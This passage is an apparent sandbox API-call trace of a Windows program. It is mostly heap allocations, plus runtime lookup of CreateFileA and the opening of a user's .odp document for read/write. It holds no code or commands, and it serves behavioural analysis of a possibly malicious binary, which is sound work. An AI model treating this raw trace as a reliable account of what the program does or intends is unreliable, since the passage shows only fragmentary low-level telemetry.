wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0036.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0036.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0036.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0036.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.040] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.042] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0036.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ce38 [0036.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ce38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0036.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.043] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0036.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0036.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ce38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0036.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.043] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0036.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0036.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp", cchWideChar=79, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0036.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4f) returned 0x7f3688 [0036.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp", cchWideChar=79, lpMultiByteStr=0x7f3688, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp", lpUsedDefaultChar=0x0) returned 79 [0036.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0036.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.044] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\8yj2_lqsak_ho8rx.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=79, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9e) returned 0x7d8600 [0036.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=79, lpWideCharStr=0x7d8600, cchWideChar=79 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp") returned 79 [0036.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0036.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0036.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) 